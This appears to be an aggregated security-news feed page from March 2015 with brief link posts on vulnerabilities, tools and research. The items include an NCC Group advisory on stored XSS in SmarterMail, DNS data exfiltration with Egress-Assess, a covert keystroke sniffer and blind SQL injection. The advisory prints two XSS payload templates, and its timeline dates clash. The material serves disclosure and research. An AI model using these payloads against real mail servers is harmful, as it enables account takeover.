Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

SmarterMail - Stored XSS in emails

March 6, 2015, 9:16 am
$
0
0
_______ _________ _________ ________
 \ \ \_ ___ \\_ ___ \ / _____/______ ____ __ ________
 / | \/ \ \// \ \/ / \ __\_ __ \/ _ \| | \____ \
 / | \ \___\ \____ \ \_\ \ | \( <_> ) | / |_> >
 \____|__ /\______ /\______ / \______ /__| \____/|____/| __/
 \/ \/ \/ \/ |__|
 https://www.nccgroup.com/research/
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Title SmarterMail - Stored XSS in emails
Release Date 6 March 2015
Reference NCC00776
Discoverer Soroush Dalili
Vendor Smarter Tools
Systems Affected v13.1.5451 and prior
CVE Reference TBC
Risk Medium
Status Fixed
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Discovered 29 December 2015
Reported 9 February 2015
Released 30 December 2015
Fixed 26 February 2015
Published 6 March 2015
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Description
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The SmarterMail application was vulnerable to a stored cross-site scripting
issue by bypassing the anti-XSS mechanisms. It was possible to run
JavaScript code when a victim user opens or replies to the attacker's email,
which contained a malicious payload. Therefore, users' passwords could be
reset by using an XSS attack, as the password reset page did not need the
current password.
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The following payload could be used to run JavaScript code by opening an
email:
<svg/onload=”insert malicious script here”></svg>
The following payload could be used to run JavaScript code by pressing the
reply button:
<iframe src=javascript: =”insert malicious script here”></iframe>
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The issue was patched in Version 13.3.5535 (2015-02-26) which can be
downloaded here:
http://www.smartertools.com/smartermail/releasenotes/v13.aspx
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Research https://www.nccgroup.com/research
Twitter https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
Open Source https://github.com/nccgroup
Blog https://www.nccgroup.com/en/blog/cyber-security/
SlideShare http://www.slideshare.net/NCC_Group/
Search

Paper: Triathlon of Lightweight Block Ciphers for the Internet of Things

March 6, 2015, 9:45 am
$
0
0
Abstract. In this paper we introduce an open framework for the benchmarking of lightweight
block ciphers on a multitude of embedded platforms. Our framework is able to evaluate execution
time, RAM footprint, as well as (binary) code size, and allows a user to define a custom “figure
of merit” according to which all evaluated candidates can be ranked. We used the framework to
benchmark various implementation of 13 lightweight ciphers, namely AES, Fantomas, HIGHT,
LBlock, LED, Piccolo, PRESENT, PRINCE, RC5, Robin, Simon, Speck, and TWINE, on three
different platforms: 8-bit ATmega, 16-bit MSP430, and 32-bit ARM. Our results give new insights
to the question of how well these ciphers are suited to secure the Internet of Things (IoT). The
benchmarking framework provides cipher designers with a tool to compare new algorithms with the
state-of-the-art and allows standardization bodies to conduct a fair and comprehensive evaluation
of a large number of candidates.


more here...........http://eprint.iacr.org/2015/209.pdf

Exfiltrate Data via DNS with Egress-Assess

March 6, 2015, 11:00 am
$
0
0
DNS is a channel that can usually be utilized to exfiltrate data out over a network.  Even in the event that a network you are operating in requires authenticating to a proxy for data to leave a network, users can typically make DNS requests which are forwarded on via the local DNS servers in the user’s network.  An attacker can utilize normal DNS functionality to forward data, C2, etc. out of the current network to a destination of their choosing, and Raphael Mudge has already weaponized this for use in Beacon with Cobalt Strike.

A new module has been added in to Egress-Assess that allows you to utilize your system’s DNS server to exfiltrate data.  This is different from the existing DNS module within Egress-Assess.  The existing module send a DNS packet directly to the DNS server you specify, the “dns_resolved” module utilizes your network’s own DNS server.

more here.......https://www.christophertruncer.com/exfiltrate-data-via-dns-with-egress-assess/

Mobile App Wall of Shame: Quikr

March 6, 2015, 12:51 pm
$
0
0
Quikr is India's largest online and mobile classifieds portal. Like Craigslist, Quikr provides the users with a platform to help them buy, sell, rent and advertise across multiple categories like real estate, jobs, entertainment, education, matrimonial, etc. Quikr also has a mobile app on both the Android and iOS platforms.

A user is required to provide an email address and password when creating an account. After creating an account, the user can the post advertisements on Quikr. The application also provides functionality wherein different users can chat with each other.

Vulnerability - Clear text username/password


more here.........http://research.zscaler.com/2015/03/mobile-app-wall-of-shame-quikr.html

The Importance of Good Labels in Security Datasets

March 6, 2015, 4:54 pm
$
0
0
Working as security researchers is common to create a new machine learning algorithm that we want to evaluate. It may be that we are trying to detect malware, identify attacks or analyze IDS logs, but at some point we figure it out that we need a good dataset to complete our task. But not any dataset; in fact we need a labeled dataset. The dataset will be used not only to learn the features of, for example, malware traffic, but also to verify how good our algorithm is. Since getting a dataset is difficult and time consuming, the most common solution is to get a third-party dataset; although some researchers with time and resources may create their own. Either way, most usually we obtain a dataset of malware traffic (continuing with the malware traffic detection example) and we assign the label Malware to all of its instances. This looks good, so we make our training and testing, we obtain results and we publish. However, there are important problems in this approach that can jeopardize the results of our algorithm and the verification process. Let's analyze each problem in turn.

more here..........https://www.mlsecproject.org/blog/2015/03/06/importance-good-labels-security-datasets/

Saying goodbye to encrypted SMS/MMS

March 6, 2015, 4:58 pm
$
0
0
It’s 2015, and the end of the road for encrypted SMS/MMS in TextSecure.

The TextSecure story started back in 2009, at the dawn of the smartphone era. Back then, TextSecure focused on securing the transport that everyone coming from feature phones was familiar with: SMS. Today, many things have changed, and TextSecure now emphasizes the “TextSecure transport,” which uses data rather than SMS. While we remain committed to supporting plaintext SMS/MMS so that TextSecure can function as a unified messenger, we are beginning the process of phasing out support for SMS/MMS as an encrypted transport.

more here..........https://whispersystems.org/blog/goodbye-encrypted-sms/

Registry Explorer 0.0.2.0 released!

March 6, 2015, 5:03 pm
$
0
0
Lots of good changes in this version that you can view here.....http://binaryforay.blogspot.com/2015/03/registry-explorer-0020-released.html

Google OAuth Target URL and Domain Description Vulnerable to UI redress attack

March 7, 2015, 1:03 am
$
0
0
Over last 3 years, I’ve participated in the Google Reward Program and found some relatively serious vulnerability. Google OAuth Target URL, Upload X.509 Cert and Domain Description Vulnerable to UI Redress Attack is my one of the oldest finding in Google Reward program.

more here..........http://blog.securelayer7.net/google-oauth-target-url-and-domain-description-vulnerable-to-ui-redress-attack/
Search

ON THE SECURITY IMPLICATIONS OF WINDOW.OPENER.LOCATION.REPLACE()

March 7, 2015, 1:15 am
$
0
0
It’s no secret I am a big fan of many HackerOne bug reports and public penetration test reports authored by companies such as Cure53 and Least Authority.

In fact, pretty much every week I spend some of my free time reading bug reports. Regularly I stumble upon very interesting attack vectors and oftentimes learn tricks I had never seen before. This post is about one of the techniques I learned sometime ago whilst reading a report submited to HackerOne, authored by a bounty hunter named Daniel Tomescu.

more here...........http://blog.whatever.io/2015/03/07/on-the-security-implications-of-window-opener-location-replace/

MentalJS DOM bypass

March 7, 2015, 1:20 am
$
0
0
Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions.

more here.........http://www.thespanner.co.uk/2015/03/06/mentaljs-dom-bypass/

Referer Header Based Blind SQL Injection Explained With Example

March 7, 2015, 4:44 am
$
0
0
Hello everyone, this post is third in series of posts that I will be doing on SQL injection. Earlier I explained Second Order SQL Injections with Example and Column Truncation SQL injection Vulnerabilities Hopefully I will be doing more of these, focusing only on topics that are not well explained anywhere else and providing examples so that readers can actually relate to what is going on. So in this post I will be explaining about referer header, blind SQL injection, I prepared a Demo for Referer Based Blind SQL injection will give a walk through of that. At the end, Blind SQL injection exploitation using SQLmap.

more here.........https://haiderm.com/referer-header-based-blind-sql-injection-explained-example/

Mono TLS vulnerabilities

March 7, 2015, 4:45 am
$
0
0
A TLS impersonation attack was discovered in Mono's TLS stack by
researchers at Inria. During checks on our TLS stack, we have
discovered two further issues which we have fixed - SSLv2 support, and
vulnerability to FREAK. These vulnerabilities affect basically every
Mono version ever released.

more here..........http://permalink.gmane.org/gmane.comp.security.oss.general/16048

Ransomware Report: The Rise of BandarChor

March 7, 2015, 4:47 am
$
0
0
This week, we have received a number of reports on yet another ransomware, BandarChor.

This ransomware is not exactly fresh. The first infections that we've noticed related to this family came in already last November.

We have had reports of BandarChor being spread via email and have seen indicators that it may have been distributed by exploit kits.

more here.........https://www.f-secure.com/weblog/archives/00002795.html

ClassNameDeobfuscator

March 7, 2015, 4:55 am
$
0
0
This is a simple script to parse through the .smali files produced by apktool and extract the .source annotation lines.

Obfuscation can be a pain to deal with when reversing an app. However, some apps do not have the .source annotation line removed/mangled druing the obfuscation process. This leaves the original Java class file name intact in the obfuscated code. We can abuse this to partially deobfuscate the class names.

To be clear, I am not claiming that I am the first to discover this, for lack of a better term let's call it, information leakage. However, I did stumble upon it independently while reversing an obfuscated app. Looking at a smali file, I noticed a .source line and a lightbulb went off. So, I threw together this script to show off the extent of what information can be revealed. See the demo section below for some relevant Proguard details.


more here.......https://github.com/HamiltonianCycle/ClassNameDeobfuscator

PHP Reflect

March 7, 2015, 4:58 am
$
0
0
PHP Reflect is a library that adds the ability to reverse-engineer classes, interfaces, functions, constants, namespaces and more.


Additional info here....https://github.com/llaville/php-reflect
Search

keysweeper

March 7, 2015, 8:33 am
$
0
0
KeySweeper is a stealthy Arduino-based device, camouflaged as a functioning USB wall charger, that wirelessly and passively sniffs, decrypts, logs and reports back (over GSM) all keystrokes from any Microsoft wireless keyboard in the vicinity.

All keystrokes are logged online and locally. SMS alerts are sent upon trigger words, usernames or URLs, exposing passwords. If unplugged, KeySweeper continues to operate using its internal battery and auto-recharges upon repowering. A web based tool allows live keystroke monitoring.

more here........https://github.com/samyk/keysweeper

Visa and Other Gift Card Transactions Exposed by GoWallet Vulnerability

March 7, 2015, 8:59 am
$
0
0
I recently received a Visa Gift Card and decided to use GoWallet to manage it, as advertised on the card’s packaging. GoWallet offers the ability to manage most types of gift cards, allowing a user to view their card’s current balance and past transactions.

I signed up on their website and associated the card to my account. Next, I downloaded the app and started to review the API requests while exploring the card management features.

Most of the requests looked normal, but the process for reviewing transactions seemed interesting.

more here.........http://randywestergren.com/visa-gift-card-transactions-exposed-gowallet-vulnerability/

Scope Injection in CFML

March 7, 2015, 9:02 am
$
0
0
Here is an interesting vulnerability that I have come across several times in real CFML code during code reviews, I have spoken about it at conferences but have never written about it. Since it doesn't really have a name, I call it Scope Injection, you'll see why in a minute.

We have the following code here........http://www.petefreitag.com/item/834.cfm

VernamTunnel

March 7, 2015, 12:49 pm
$
0
0
Cross-platform multi-thread TCP tunnel with Vernam cipher encryption. You can use this software to enable remote access to your private services in your network.

more here.......https://github.com/codeandsec/VernamTunnel

Blog on Section Based Code Injection and Its Detection (Inclusive tool to help malware analysts tell that the sample is injecting code into other process)

March 8, 2015, 12:39 am
$
0
0
I wrote a small tool to detect a possible code injection even if it is done by only section APIs.

A few weeks ago, I had an opportunity to analyze ransomware referred as Urausy. At a very initial stage of analysis, its behaviour seemed to be nothing surprising to me; it injected code into explorer.exe, and the injected code spawned svchost.exe hosting malicious code and initiated main ransom activities

more here..........http://standa-note.blogspot.ca/2015/03/section-based-code-injection-and-its.html
Viewing all 8064 articles
Browse latest View live
Search